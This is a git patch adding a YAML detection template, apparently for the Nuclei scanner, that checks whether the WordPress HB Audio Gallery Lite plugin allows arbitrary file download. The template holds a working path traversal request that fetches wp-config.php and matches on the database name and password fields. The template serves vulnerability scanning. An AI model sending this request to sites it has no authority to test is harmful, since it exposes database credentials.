From 150da05a81af4d51b95ef603a9fd59518fafea63 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Feb 2022 23:46:52 +0530 Subject: [PATCH] Create wp-hb-audio-lfi.yaml --- .../wordpress/wp-hb-audio-lfi.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-hb-audio-lfi.yaml diff --git a/vulnerabilities/wordpress/wp-hb-audio-lfi.yaml b/vulnerabilities/wordpress/wp-hb-audio-lfi.yaml new file mode 100644 index 0000000000..c55449d11d --- /dev/null +++ b/vulnerabilities/wordpress/wp-hb-audio-lfi.yaml @@ -0,0 +1,27 @@ +id: wp-hb-audio-lfi + +info: + name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download + author: dhiyaneshDK + severity: high + reference: + - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200